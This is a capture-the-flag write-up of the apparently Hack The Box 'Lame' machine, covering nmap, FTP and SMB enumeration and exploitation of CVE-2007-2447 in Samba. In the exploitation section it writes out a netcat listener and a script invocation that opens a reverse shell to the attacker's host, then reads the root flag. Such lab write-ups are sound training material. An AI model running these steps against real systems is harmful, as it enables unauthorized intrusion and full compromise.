Summary

Lame is an easy Linux box that can be exploited with CVE-2007-2447 - no privilege escalation was required.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -Pn -oN fullnmap 10.129.24.78

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was Anonymous login with FTP:

	ftp 10.129.24.78
Connected to 10.129.24.78.
220 (vsFTPd 2.3.4)
Name (10.129.24.78:jeroen): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
	ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.

FTP Anonymous Login

Anonymous login was successful (username: anonymous, password: blank). Unfortunately, no useful information was found here.

SMB Enumeration

The next thing was to enumerate SMB with smbmap to check for shares and permissions:

	smbmap -H 10.129.24.78
	[+] IP: 10.129.24.78:445	Name: 10.129.24.78       

        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

The tmp directory is both, readable and writeable. You can connect with: smbclient \\\\10.129.24.78\\tmp
The share contained the following files and directories:

smb: \> ls
  .                                   D        0  Mon Oct 19 14:08:46 2020
  ..                                 DR        0  Sun May 20 19:36:12 2012
  5303.jsvc_up                        R        0  Mon Oct 19 12:57:23 2020
  .ICE-unix                          DH        0  Mon Oct 19 12:56:14 2020
  vmware-root                        DR        0  Mon Oct 19 12:56:22 2020
  .X11-unix                          DH        0  Mon Oct 19 12:56:36 2020
  .X0-lock                           HR       11  Mon Oct 19 12:56:36 2020

No sensitive files or information was stored here.

Netbios

The next thing was to google the Netbios version that nmap discovered: netbios-ssn Samba smbd 3.0.20-Debian
This resulted in the following CVE: 2007-2447 that could potentially be used to exploit the target.


Exploitation

This file was downloaded to exploit this manually.
A netcat listener was opened: nc -nvlp 4444 and the following command was used:
python3 usermap_script.py 10.129.24.78 139 10.10.14.33 4444

This opens a netcat shell from where you can navigate to the home directory and see the following users:

cd /home

ls
ftp
makis
service
user

The user makis contains the user.txt
To obtain root, you can simply cat /root/root.txt

cat /home/makis/user.txt && cat /root/root.txt

69454a937d9[...]
92caac3be14[...]